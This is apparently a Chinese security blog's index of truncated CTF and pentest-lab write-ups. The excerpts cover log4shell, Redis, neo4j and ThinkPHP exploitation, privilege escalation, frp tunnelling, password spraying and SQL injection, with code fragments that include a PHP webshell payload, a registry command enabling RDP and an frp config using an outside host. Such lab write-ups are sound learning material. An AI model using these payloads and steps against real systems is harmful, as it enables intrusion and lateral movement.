St4rr's Blog

一如既往先上fscan扫一遍 img 8983端口有个solr，可以看到存在log4j，这里存在log4shell漏洞 img img img 用现成工具弹shell img img img 看不了/root，需要提权发现这里可以sudo提权，grc命令配置错误 img img 上传fscan扫一下内网，除本机外还有三台主机，一台域控，一台windows server，一台ubuntu是ftp服务器 img 搭建frp img img 题目中提示smb，那么尝试通过smb服务访问文件服务器，得到第二个flag img img 回到上一级，下载db文件 img 连接上查看一下，可以在一个表中找到四个密码，但是不知道用户名，在另一个表中有大量用户名 img img 对windows server尝试密钥喷洒 proxychains4 ...

还是太菜了，签了个到就遗憾退场了，感觉脑子越来越转不动了，跟出题人的脑电波越来越对不上了 Misc 量子双生影 在尝试将图片传到wsl里时就自己分成了两张图片 image-20250714094621268 把多出来的那张与原图异或一下，得到另一个二维码 image-20250714094848378 扫出来就是flag：L3HCTF{Quantum_ADS_XOR}

帮联队里别的师傅看的比赛，做了点简单题 Misc ez-picture 伪加密改回去解开压缩包 image-20250713190109710 对于key.txt：base100 -> base64 image-20250713190221446 image-20250713190251979 用key对flag文件异或，得到一个png image-20250713190344888 爆破png的宽高，修改为正确的值即可看到flag 12345678910111213141516171819import binasciiimport structcrcbp = open("download.png", "rb").read() #填入图片名crc32frombp = int(crcbp[29:33].hex(),16) print(crc32frombp) for i in range(10000): ...

R3的题还是太顶了，题量大但只会签到（ Forensics The R3 Pig Problem 打开可以看到很多tcp流，这些tcp流的时间戳存在规律 image-20250706142646509 提取出来，计算时间差，接近0.02的记为0，接近0.1的记为1 image-20250706142756381 1234567891011121314151617181920212223242526272829def classify_time_diff(diff): if abs(diff - 0.02) < abs(diff - 0.1): return '0' else: return '1'def process_file(filename): with open(filename, 'r') as f: lines = f.readlines() result = [] i = 1 whi ...

fscan扫一遍，发现存在redis未授权漏洞 img 用脚本getshell img 发现没有权限读flag，发现可以利用base64命令suid提权 img img img 传个fscan上去扫一下内网 img 搭建frp img img 先尝试攻击搭建了wordpress的那台主机 wpscan扫一遍，扫出来有个wpcargo插件 img 用脚本写入木马 12345678910111213141516171819202122232425import sysimport binasciiimport requests# This is a magic string that when treated as pixels and compressed using the png# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file ...

Time fscan扫一遍 img 有7687端口，这是neo4j的端口。这里存在CVE-2021-34371未授权RCE，我们可以以此反弹shell img img 拿到flag1和提示kerberos的认证过程 img 上传fscan扫一下，扫出来还有三台主机 img 搭建frp，访问搭建了web服务的那台主机 img img img 这里可以用sqlmap一把梭，找到第二个flag img 读取数据库中的用户表，总共有500个用户，把这些用户的名称都dump下来做成一个字典 img 12345678910import csvinput_csv = 'oa_users.csv'output_txt = 'usernames.txt'with open(input_csv, mode='r', encoding='utf-8') as csvfile: ...

fscan扫出来有mssql数据库，有了账号密码 img 用MUDT连接，先激活一下xpshell组件 img img 上传SweetPotato成功提权 img img 添加用户，开启远程登陆 img img 开启远程桌面 REG ADD HKLMServer /v fDenyTSConnections /t REG_DWORD /d 00000000 /f img 远程桌面连接上，找到第一个flag img 查看ip，上传fscan扫内网 img img 可以看到除了打下来的这台以外还有三台机器，一台域控，两台域内机器。 quser看到还有一个叫做john的用户通过rdp连接了 img netstat查看网络连接状态，看到是来自域内另一个主机 img 到这里歇了歇，下次再做。 上传cs的后门并执行 img 注入进程 img img ...

这次没有得奖（ 做出来了一半的题目，都是各个方向比较基本的题。有一题比较遗憾，由于时间原因倒在了出答案的前一步，不然应该就能拿到奖了（ 这次又成功面基了几位星盟的师傅:) Crypto crypto1 image-20250611141724525 Misc Misc1 找到一个表格 image-20250611145820652 在cmdscan中找到密码 image-20250611145820652 隐藏文字 image-20250611145840515 UTF-7 image-20250611145857308 Crypto Crypto1 指数很小，爆破就行 1234567891011121314from Crypto.Util.number import *import gmpy2n=933132591603649661272081363592225803528096281299294958684014567416493105150760078378922298065 ...

先上fscan扫一遍，扫出thinkphp一个rce的洞 img 用工具，getshell img 写个马进去 img 蚁剑连接 img img 当前用户是www-data，需要提权 发现可以sudo提权，mysql被配置了root权限，去gtfobins上查一下 img img 查找所有名字含flag的文件，找到flag01.txt img img 看下内网ip img 用蚁剑传个fscan上去扫描一下（记得chmod 777 fscan） img 可以看到除了我们打下来的这台主机外，还有三台主机：一台是信呼OA服务器，一台是DC域控，一台是个有永恒之蓝的洞的windows 接下来配置frp转发流量 frpc.ini 12345678[common]serverAddr = "60.204.245.37"serverPort = 7000[socks_proxy]type = tcprem ...

CVE-2022-32991 靶标介绍： 该CMS的welcome.php中存在SQL注入攻击。 随便注册一个账号先登录一下，来到题目所说的welcome.php img 点start可以发现有很多的get参数 img 拿上cookie，用sqlmap能一把梭（） img img img CVE-2022-30887 靶标介绍： 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。 原来似乎可以通过访问网站开发者的个人网站找到其邮箱，现在好像删掉了。 密码则是弱口令，作者名字mayurik 成功登录后，由题目找到Medicine-Manage Medicine下存在文件上传漏洞，直接写一个一句话木马传 ...